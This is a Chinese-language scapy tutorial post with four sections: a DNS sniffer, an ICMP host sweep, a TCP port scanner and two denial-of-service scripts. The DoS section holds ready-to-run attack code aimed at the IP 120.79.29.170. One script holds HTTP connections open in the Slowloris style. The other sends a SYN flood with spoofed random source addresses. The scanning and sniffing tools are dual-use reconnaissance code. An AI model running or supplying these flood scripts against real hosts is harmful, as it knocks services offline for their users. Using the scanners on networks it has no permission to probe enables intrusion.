Python scapy的简单使用

Python scapy的简单使用,第1张

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

一、DNS监测简单脚本?

主要通过抓取端口53以及dns的包,通过数据包的qname和rrname判断是否存在某个域名的解析

from scapy.all import *
from scapy.layers.dns import DNSQR, DNSRR, DNS
from scapy.layers.inet import IP
import time


def dns_sniff(packge):
    if 'baidu.com' in str(packge[DNSQR].qname) and DNSRR not in packge:
        print(time.strftime("%H:%M:%S", time.localtime()))
        print("解析url: %s 从ip %s 向%s域名服务器发送请求" % (
        str(packge[DNSQR].qname[:-1]).strip('b'), packge[IP].src, packge[IP].dst))
    if DNSRR in packge and packge.sport == 53 and DNSQR in packge:
        if 'baidu.com' in str(packge[DNSRR].rrname):
            print("解析url: %s 从域名服务器 %s 向%s发送回应" % (
                str(packge[DNSQR].qname[:-1]).strip('b'), packge[IP].src, packge[IP].dst))
            for i in range(packge[DNS].ancount):
                dnsrr = packge[DNS].an[i]
                print("域名服务器将url: %s 解析为 %s" % (
                    str(dnsrr.rrname[:-1]).strip('b'), str(dnsrr.rdata).strip('b')))


def main():
    packge = sniff(filter='udp and port 53', prn=dns_sniff)


if __name__ == '__main__':
    main()
二、模拟Dos攻击和拒绝服务攻击

伪造源ip地址和随机端口往某服务器发TCP的包,使服务器进入等待状态,包足够多,服务器无法接受正常流量

import time
import threading
import requests
import socket

url = "http://120.79.29.170"
data = ("GET /HTTP/1.0\r\n"
        "Host: 120.79.29.170\r\n"
        "Content-Length: 10000000\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0\r\n"
        )

sockets = []


def request_thread():
    for i in range(1, 10000):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect(('120.79.29.170', 80))
            s.send(data.encode())
            print(f"dos攻击第{i}\n")
            sockets.append(s)
        except Exception as ex:
            print(f"Couldn't connect 120.79.29.170{ex}")
            time.sleep(10)


def send_thread():
    global sockets
    while True:
        for s in sockets:
            try:
                s.send("f".encode())
            except Exception as ex:
                print(f"Send Exception:%s\n{ex}")
                sockets.remove(s)
                s.close()
        time.sleep(1)


start = threading.Thread(target=request_thread, args=())
send = threading.Thread(target=send_thread, args=())

start.start()
send.start()
from scapy.all import *
import random
from scapy.layers.inet import IP, TCP
from scapy.layers.l2 import Ether


def dos():
    for i in range(1, 100000):
        random_ip = str(random.randint(120, 150)) + "." + str(random.randint(1, 254)) + "." + str(
            random.randint(1, 254)) + "." + str(random.randint(1, 254))
        seq_number = random.randint(1, 65535 * 65535)
        ack_number = random.randint(1, 65535 * 65535)
        random_sport = random.randrange(20000, 65535, 1)
        payload = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
        data = IP(src=random_ip, dst="120.79.29.170") / TCP(
            sport=random_sport, dport=80, flags="S", window=8192, seq=seq_number, ack=ack_number) / payload
        send(data, verbose=False)


if __name__ == '__main__':
    start = threading.Thread(target=dos(), args=())
    start.start()
三、主机扫描

通过向ip段发IP和ICMP的包,通过是否有回应包判断主机是否存活

from scapy.all import *
from scapy.layers.inet import TCP, IP, ICMP


def icmp_scan(startip, endip, number):
    for i in range(0, number + 1):
        ipend = startip.split('.')[3]
        last = int(ipend) + int(i)
        ip = startip.split('.')[0] + '.' + startip.split('.')[1] + '.' + startip.split('.')[2] + '.' + str(last)
        p = IP(dst=ip) / ICMP()
        ans = sr1(p, timeout=3, verbose=0)
        if ans is not None:
            print(str(ip) + "主机存活")
        else:
            print(str(ip) + "主机不存活")


if __name__ == '__main__':
    sip = input("起始扫描的网段ip:")
    eip = input("终止扫描的网段ip:")
    s = sip.split('.')[3]
    e = eip.split('.')[3]
    num = int(e) - int(s)
    start = threading.Thread(target=icmp_scan, args=(sip, eip, num))
    start.start()
四、端口扫描

通过向某ip的端口发送IP/TCP的数据包,接受回应的数据,判断数据包中是否存在关键字‘SA'判断是否存活

from scapy.all import *
from scapy.layers.inet import TCP, IP
import re

conf.verb = 0


def portscan(ip, lport, hport):
    for i in range(int(lport), int(hport)):
        data = IP(dst=ip) / TCP(dport=i)
        ans, unans = sr(data, timeout=3)
        if ans:
            res = str(ans[0])
            if re.findall("SA", res):
                print(str(i) + "存活")
            else:
                print(str(i) + "不存活")
        else:
            print(str(i) + "不存活")


if __name__ == '__main__':
    ip = input("输入要扫描的ip地址:")
    lport = input("要扫描的起始端口:")
    hport = input("要扫描的结束端口")
    start = threading.Thread(target=portscan, args=(ip, lport, hport))
    start.start()

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/915826.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-16
下一篇 2022-05-16

发表评论

登录后才能评论

评论列表(0条)

保存